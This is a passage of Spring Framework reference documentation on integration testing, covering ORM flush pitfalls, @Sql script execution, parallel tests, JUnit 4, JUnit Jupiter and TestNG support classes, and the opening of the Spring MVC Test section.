logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of a Hibernate session or JPA\npersistence context, make sure to __flush__ the underlying unit of work within test\nmethods that execute that code. Failing to flush the underlying unit of work can produce\n__false positives__: your test may pass, but the same code throws an exception in a live,\nproduction environment. In the following Hibernate-based example test case, one method\ndemonstrates a false positive, and the other method correctly exposes the results of\nflushing the session. 
Note that this applies to any ORM frameworks that maintain an\nin-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tSessionFactory sessionFactory;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@PersistenceContext\n\tEntityManager entityManager;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<data-access.adoc#jdbc-embedded-database-support, Embedded database support>> and\n<<data-access.adoc#jdbc-embedded-database-dao-testing,\nTesting data access logic with an embedded database>> for details.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. 
`ResourceDatabasePopulator` provides options for configuring the
character encoding, statement separator, comment delimiters, and error handling flags
used when parsing and executing the scripts, and each of the configuration options has
a reasonable default value. Consult the javadocs for details on default values. To
execute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either
the `populate(Connection)` method to execute the populator against a
`java.sql.Connection` or the `execute(DataSource)` method to execute the populator
against a `javax.sql.DataSource`. The following example specifies SQL scripts for a test
schema and test data, sets the statement separator to `"@@"`, and then executes the
scripts against a `DataSource`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	public void databaseTest() {
		ResourceDatabasePopulator populator = new ResourceDatabasePopulator();
		populator.addScripts(
			new ClassPathResource("test-schema.sql"),
			new ClassPathResource("test-data.sql"));
		populator.setSeparator("@@");
		populator.execute(this.dataSource);
		// execute code that uses the test schema and data
	}
----

Note that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing
and executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in
<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and
<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>
internally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs
for the various `executeSqlScript(..)` methods for further details.


[[testcontext-executing-sql-declaratively]]
===== Executing SQL scripts declaratively with @Sql

In addition to the aforementioned mechanisms for executing SQL scripts
_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring
TestContext Framework. Specifically, the `@Sql` annotation can be declared on a test
class or test method to configure the resource paths to SQL scripts that should be
executed against a given database either before or after an integration test method. Note
that method-level declarations override class-level declarations and that support for
`@Sql` is provided by the `SqlScriptsTestExecutionListener` which is enabled by default.

*Path resource semantics*

Each path will be interpreted as a Spring `Resource`. A plain path -- for example,
`"schema.sql"` -- will be treated as a classpath resource that is _relative_ to the
package in which the test class is defined. A path starting with a slash will be treated
as an _absolute_ classpath resource, for example: `"/org/example/schema.sql"`.
A path
which references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)
will be loaded using the specified resource protocol.

The following example demonstrates how to use `@Sql` at the class level and at the method
level within a JUnit Jupiter based integration test class.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@SpringJUnitConfig
	@Sql("/test-schema.sql")
	class DatabaseTests {

		@Test
		void emptySchemaTest() {
			// execute code that uses the test schema without any test data
		}

		@Test
		@Sql({"/test-schema.sql", "/test-user-data.sql"})
		void userTest() {
			// execute code that uses the test schema and test data
		}
	}
----

*Default script detection*

If no SQL scripts are specified, an attempt will be made to detect a _default_ script
depending on where `@Sql` is declared. If a default cannot be detected, an
`IllegalStateException` will be thrown.

* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the
	corresponding default script is `"classpath:com/example/MyTest.sql"`.
* __method-level declaration__: if the annotated test method is named `testMethod()` and is
	defined in the class `com.example.MyTest`, the corresponding default script is
	`"classpath:com/example/MyTest.testMethod.sql"`.

*Declaring multiple `@Sql` sets*

If multiple sets of SQL scripts need to be configured for a given test class or test
method but with different syntax configuration, different error handling rules, or
different execution phases per set, it is possible to declare multiple instances of
`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the
`@SqlGroup` annotation can be used as an explicit container for declaring multiple
instances of `@Sql`.

The following example demonstrates the use of `@Sql` as a repeatable annotation using
Java 8. In this scenario the `test-schema.sql` script uses a different syntax for
single-line comments.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`"))
	@Sql("/test-user-data.sql")
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

The following example is identical to the above except that the `@Sql` declarations are
grouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@SqlGroup({
		@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`")),
		@Sql("/test-user-data.sql")
	})
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

*Script execution phases*

By default, SQL scripts will be executed _before_ the corresponding test method. However,
if a particular set of scripts needs to be executed _after_ the test method -- for
example, to clean up database state -- the `executionPhase` attribute in `@Sql` can be
used as seen in the following example.
Note that `ISOLATED` and `AFTER_TEST_METHOD` are
statically imported from `SqlConfig.TransactionMode` and `Sql.ExecutionPhase`,
respectively.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "create-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED)
	)
	@Sql(
		scripts = "delete-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED),
		executionPhase = AFTER_TEST_METHOD
	)
	public void userTest() {
		// execute code that needs the test data to be committed
		// to the database outside of the test's transaction
	}
----

*Script configuration with `@SqlConfig`*

Script parsing and error handling can be configured via the `@SqlConfig` annotation. When
declared as a class-level annotation on an integration test class, `@SqlConfig` serves as
_global_ configuration for all SQL scripts within the test class hierarchy. When declared
directly via the `config` attribute of the `@Sql` annotation, `@SqlConfig` serves as
_local_ configuration for the SQL scripts declared within the enclosing `@Sql`
annotation. Every attribute in `@SqlConfig` has an implicit default value which is
documented in the javadocs of the corresponding attribute. Due to the rules defined for
annotation attributes in the Java Language Specification, it is unfortunately not
possible to assign a value of `null` to an annotation attribute. Thus, in order to
support overrides of inherited global configuration, `@SqlConfig` attributes have an
explicit default value of either `""` for Strings or `DEFAULT` for Enums. This approach
allows local declarations of `@SqlConfig` to selectively override individual attributes
from global declarations of `@SqlConfig` by providing a value other than `""` or
`DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`
attributes do not supply an explicit value other than `""` or `DEFAULT`. Explicit _local_
configuration therefore overrides _global_ configuration.

The configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those
supported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those
provided by the `<jdbc:initialize-database/>` XML namespace element. Consult the javadocs
of individual attributes in `@Sql` and `@SqlConfig` for details.

[[testcontext-executing-sql-declaratively-tx]]
*Transaction management for `@Sql`*

By default, the `SqlScriptsTestExecutionListener` will infer the desired transaction
semantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed
without a transaction, within an existing Spring-managed transaction -- for example, a
transaction managed by the `TransactionalTestExecutionListener` for a test annotated with
`@Transactional` -- or within an isolated transaction, depending on the configured value
of the `transactionMode` attribute in `@SqlConfig` and the presence of a
`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum,
however, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.

If the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and
`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,
you may specify explicit names via the `dataSource` and `transactionManager` attributes
of `@SqlConfig`.
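As an illustration, assuming beans named `testDataSource` and `testTxMgr` are defined in
the test's `ApplicationContext`, an explicit configuration might look like the following
sketch.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "/test-data.sql",
		config = @SqlConfig(dataSource = "testDataSource", transactionManager = "testTxMgr")
	)
	public void userTest() {
		// execute code that uses the test data
	}
----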
Furthermore, the transaction propagation behavior can be controlled via\nthe `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be\nexecuted in an isolated transaction. Although a thorough discussion of all supported\noptions for transaction management with `@Sql` is beyond the scope of this reference\nmanual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide\ndetailed information, and the following example demonstrates a typical testing scenario\nusing JUnit Jupiter and transactional tests with `@Sql`. Note that there is no need to\nclean up the database after the `usersTest()` method is executed since any changes made\nto the database (either within the test method or within the `\/test-data.sql` script)\nwill be automatically rolled back by the `TransactionalTestExecutionListener` (see\n<<testcontext-tx,transaction management>> for details).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@SpringJUnitConfig(TestDatabaseConfig.class)\n\t@Transactional\n\tclass TransactionalSqlScriptsTests {\n\n\t\tfinal JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tTransactionalSqlScriptsTests(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\t@Sql(\"\/test-data.sql\")\n\t\tvoid usersTest() {\n\t\t\t\/\/ verify state in test database:\n\t\t\tassertNumUsers(2);\n\t\t\t\/\/ execute code that uses the test data...\n\t\t}\n\n\t\tint countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tvoid assertNumUsers(int expected) {\n\t\t\tassertEquals(expected, countRowsInTable(\"user\"),\n\t\t\t\t\"Number of rows in the [user] table.\");\n\t\t}\n\t}\n----\n\n\n[[testcontext-parallel-test-execution]]\n==== Parallel test execution\n\nSpring Framework 5.0 introduces basic support for executing tests in parallel within a\nsingle JVM when using the _Spring TestContext Framework_. In general this means that most\ntest classes or test methods can be executed in parallel without any changes to test code\nor configuration.\n\n[TIP]\n====\nFor details on how to set up parallel test execution, consult the documentation for your\ntesting framework, build tool, or IDE.\n====\n\nKeep in mind that the introduction of concurrency into your test suite can result in\nunexpected side effects, strange runtime behavior, and tests that only fail intermittently\nor seemingly randomly. The Spring Team therefore provides the following general guidelines\nfor when __not__ to execute tests in parallel.\n\n__Do not execute tests in parallel if:__\n\n* Tests make use of Spring's `@DirtiesContext` support.\n* Tests make use of JUnit 4's `@FixMethodOrder` support or any testing framework feature\n that is designed to ensure that test methods execute in a particular order. Note,\n however, that this does not apply if entire test classes are executed in parallel.\n* Tests change the state of shared services or systems such as a database, message broker,\n filesystem, etc. This applies to both in-memory and external systems.\n\n[TIP]\n====\nIf parallel test execution fails with an exception stating that the `ApplicationContext`\nfor the current test is no longer active, this typically means that the\n`ApplicationContext` was removed from the `ContextCache` in a different thread.\n\nThis may be due to the use of `@DirtiesContext` or due to automatic eviction from the\n`ContextCache`. 
If `@DirtiesContext` is the culprit, you will either need to find a way\nto avoid using `@DirtiesContext` or exclude such tests from parallel execution. If the\nmaximum size of the `ContextCache` has been exceeded, you can increase the maximum size\nof the cache. See the discussion on <<testcontext-ctx-management-caching,context\ncaching>> for details.\n====\n\n[WARNING]\n====\nParallel test execution in the Spring TestContext Framework is only possible if the\nunderlying `TestContext` implementation provides a _copy constructor_ as explained in the\njavadocs for `TestContext`. The `DefaultTestContext` used in Spring provides such a\nconstructor; however, if you use a third-party library that provides a custom\n`TestContext` implementation, you will need to verify if it is suitable for parallel test\nexecution.\n====\n\n[[testcontext-support-classes]]\n==== TestContext Framework support classes\n\n\n[[testcontext-junit4-runner]]\n===== Spring JUnit 4 Runner\n\nThe __Spring TestContext Framework__ offers full integration with JUnit 4 through a\ncustom runner (supported on JUnit 4.12 or higher). By annotating test classes with\n`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`\nvariant, developers can implement standard JUnit 4 based unit and integration tests and\nsimultaneously reap the benefits of the TestContext framework such as support for loading\napplication contexts, dependency injection of test instances, transactional test method\nexecution, and so on. If you would like to use the Spring TestContext Framework with an\nalternative runner such as JUnit 4's `Parameterized` or third-party runners such as the\n`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support\nfor JUnit rules>> instead.\n\nThe following code listing displays the minimal requirements for configuring a test class\nto run with the custom Spring `Runner`. `@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit 4 Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit 4's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. 
The following example
demonstrates the proper way to declare these rules in an integration test.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// Optionally specify a non-Spring Runner via @RunWith(...)
@ContextConfiguration
public class IntegrationTest {

	@ClassRule
	public static final SpringClassRule springClassRule = new SpringClassRule();

	@Rule
	public final SpringMethodRule springMethodRule = new SpringMethodRule();

	@Test
	public void testMethod() {
		// execute test logic...
	}
}
----


[[testcontext-support-classes-junit4]]
===== JUnit 4 support classes

The `org.springframework.test.context.junit4` package provides the following support
classes for JUnit 4 based test cases (supported on JUnit 4.12 or higher).

* `AbstractJUnit4SpringContextTests`
* `AbstractTransactionalJUnit4SpringContextTests`

`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the
__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in
a JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can
access a `protected` `applicationContext` instance variable that can be used to perform
explicit bean lookups or to test the state of the context as a whole.

`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension
of `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC
access. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`
bean to be defined in the `ApplicationContext`. When you extend
`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`
instance variable that can be used to execute SQL statements to query the database. Such
queries can be used to confirm database state both __prior to__ and __after__ execution of
database-related application code, and Spring ensures that such queries run in the scope of
the same transaction as the application code. When used in conjunction with an ORM tool,
be sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in
<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`
also provides convenience methods which delegate to methods in `JdbcTestUtils` using the
aforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`
provides an `executeSqlScript(..)` method for executing SQL scripts against the configured
`DataSource`, as shown in the sketch below.

[TIP]
====
These classes are a convenience for extension. If you do not want your test classes to be
tied to a Spring-specific class hierarchy, you can configure your own custom test classes
by using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's
JUnit rules>>.
====
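The following is a minimal sketch of such a subclass; the `TestDatabaseConfig`
configuration class (assumed to declare a `DataSource` and a `PlatformTransactionManager`)
and the `user` table are hypothetical.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	import static org.junit.Assert.assertEquals;

	import org.junit.Test;
	import org.springframework.test.context.ContextConfiguration;
	import org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests;

	// TestDatabaseConfig is assumed to define a DataSource and a PlatformTransactionManager
	@ContextConfiguration(classes = TestDatabaseConfig.class)
	public class UserRepositoryTests extends AbstractTransactionalJUnit4SpringContextTests {

		@Test
		public void insertUser() {
			// jdbcTemplate and countRowsInTable(..) are inherited from the base class;
			// the insert runs within the test's transaction and is rolled back afterwards
			int before = countRowsInTable("user");
			this.jdbcTemplate.update("INSERT INTO user (name) VALUES (?)", "Jane");
			assertEquals(before + 1, countRowsInTable("user"));
		}
	}
----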
[[testcontext-junit-jupiter-extension]]
===== SpringExtension for JUnit Jupiter

The __Spring TestContext Framework__ offers full integration with the _JUnit Jupiter_
testing framework introduced in JUnit 5. By annotating test classes with
`@ExtendWith(SpringExtension.class)`, developers can implement standard JUnit Jupiter
based unit and integration tests and simultaneously reap the benefits of the TestContext
framework such as support for loading application contexts, dependency injection of test
instances, transactional test method execution, and so on.

Furthermore, thanks to the rich extension API in JUnit Jupiter, Spring is able to provide
the following features above and beyond the feature set that Spring supports for JUnit 4
and TestNG.

* Dependency injection for test constructors, test methods, and test lifecycle callback
 methods
 - See <<testcontext-junit-jupiter-di>> for further details.
* Powerful support for link:http://junit.org/junit5/docs/current/user-guide/#extensions-conditions[_conditional test execution_]
 based on SpEL expressions, environment variables, system properties, etc.
 - See the documentation for `@EnabledIf` and `@DisabledIf` in
 <<integration-testing-annotations-junit-jupiter>> for further details and examples.
* Custom _composed annotations_ that combine annotations from Spring **and** JUnit
 Jupiter.
 - See the `@TransactionalDevTestConfig` and `@TransactionalIntegrationTest` examples in
 <<integration-testing-annotations-meta>> for further details.

The following code listing demonstrates how to configure a test class to use the
`SpringExtension` in conjunction with `@ContextConfiguration`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// Instructs JUnit Jupiter to extend the test with Spring support.
@ExtendWith(SpringExtension.class)
// Instructs Spring to load an ApplicationContext from TestConfig.class
@ContextConfiguration(classes = TestConfig.class)
class SimpleTests {

	@Test
	void testMethod() {
		// execute test logic...
	}
}
----

Since annotations in JUnit 5 can also be used as meta-annotations, Spring is able to
provide `@SpringJUnitConfig` and `@SpringJUnitWebConfig` __composed annotations__ to
simplify the configuration of the test `ApplicationContext` and JUnit Jupiter.

For example, the following listing uses `@SpringJUnitConfig` to reduce the amount of
configuration used in the previous example.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// Instructs Spring to register the SpringExtension with JUnit
// Jupiter and load an ApplicationContext from TestConfig.class
@SpringJUnitConfig(TestConfig.class)
class SimpleTests {

	@Test
	void testMethod() {
		// execute test logic...
	}
}
----

Similarly, the following example uses `@SpringJUnitWebConfig` to create a
`WebApplicationContext` for use with JUnit Jupiter.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
// Instructs Spring to register the SpringExtension with JUnit
// Jupiter and load a WebApplicationContext from TestWebConfig.class
@SpringJUnitWebConfig(TestWebConfig.class)
class SimpleWebTests {

	@Test
	void testMethod() {
		// execute test logic...
	}
}
----

See the documentation for `@SpringJUnitConfig` and `@SpringJUnitWebConfig` in
<<integration-testing-annotations-junit-jupiter>> for further details.


[[testcontext-junit-jupiter-di]]
===== Dependency Injection with the SpringExtension

The `SpringExtension` implements the
link:http://junit.org/junit5/docs/current/user-guide/#extensions-parameter-resolution[`ParameterResolver`]
extension API from JUnit Jupiter which allows Spring to provide dependency injection for
test constructors, test methods, and test lifecycle callback methods.
Specifically, the `SpringExtension` is able to inject dependencies from the test's
`ApplicationContext` into test constructors and methods annotated with `@BeforeAll`,
`@AfterAll`, `@BeforeEach`, `@AfterEach`, `@Test`, `@RepeatedTest`, `@ParameterizedTest`,
etc.

[[testcontext-junit-jupiter-di-constructor]]
====== Constructor Injection

If a parameter in a constructor for a JUnit Jupiter test class is of type
`ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with
`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific
parameter with the corresponding bean from the test's `ApplicationContext`. A test
constructor can also be directly annotated with `@Autowired` if all of the parameters
should be supplied by Spring.

[WARNING]
====
If the constructor for a test class is itself annotated with `@Autowired`, Spring will
assume the responsibility for resolving **all** parameters in the constructor.
Consequently, no other `ParameterResolver` registered with JUnit Jupiter will be able to
resolve parameters for such a constructor.
====

In the following example, Spring will inject the `OrderService` bean from the
`ApplicationContext` loaded from `TestConfig.class` into the
`OrderServiceIntegrationTests` constructor. Note as well that this feature allows test
dependencies to be `final` and therefore _immutable_.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
@SpringJUnitConfig(TestConfig.class)
class OrderServiceIntegrationTests {

	private final OrderService orderService;

	@Autowired
	OrderServiceIntegrationTests(OrderService orderService) {
		this.orderService = orderService;
	}

	// tests that use the injected OrderService
}
----

[[testcontext-junit-jupiter-di-method]]
====== Method Injection

If a parameter in a JUnit Jupiter test method or test lifecycle callback method is of
type `ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with
`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific
parameter with the corresponding bean from the test's `ApplicationContext`.

In the following example, Spring will inject the `OrderService` from the
`ApplicationContext` loaded from `TestConfig.class` into the `deleteOrder()` test method.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
@SpringJUnitConfig(TestConfig.class)
class OrderServiceIntegrationTests {

	@Test
	void deleteOrder(@Autowired OrderService orderService) {
		// use orderService from the test's ApplicationContext
	}
}
----

Due to the robustness of the `ParameterResolver` support in JUnit Jupiter, it is also
possible to have multiple dependencies injected into a single method not only from Spring
but also from JUnit Jupiter itself or other third-party extensions.

The following example demonstrates how to have both Spring and JUnit Jupiter inject
dependencies into the `placeOrderRepeatedly()` test method simultaneously.
Note that the\nuse of `@RepeatedTest` from JUnit Jupiter allows the test method to gain access to the\n`RepetitionInfo`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n @RepeatedTest(10)\n void placeOrderRepeatedly(RepetitionInfo repetitionInfo,\n @Autowired OrderService orderService) {\n\n \/\/ use orderService from the test's ApplicationContext\n \/\/ and repetitionInfo from JUnit Jupiter\n }\n}\n----\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. 
It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. Here is a\nJUnit Jupiter based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\nimport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\nimport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n@SpringJUnitWebConfig(locations = \"test-servlet-context.xml\")\nclass ExampleTests {\n\n private MockMvc mockMvc;\n\n @BeforeEach\n void setup(WebApplicationContext wac) {\n this.mockMvc = MockMvcBuilders.webAppContextSetup(wac).build();\n }\n\n @Test\n void getAccount() throws Exception {\n this.mockMvc.perform(get(\"\/accounts\/1\")\n .accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n .andExpect(status().isOk())\n .andExpect(content().contentType(\"application\/json\"))\n .andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n }\n\n}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. 
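For instance, here is a minimal sketch of an equivalent Java-based configuration; the
`WebConfig` class name and the scanned package are assumptions, not part of the sample
above.

[source,java,indent=0]
----
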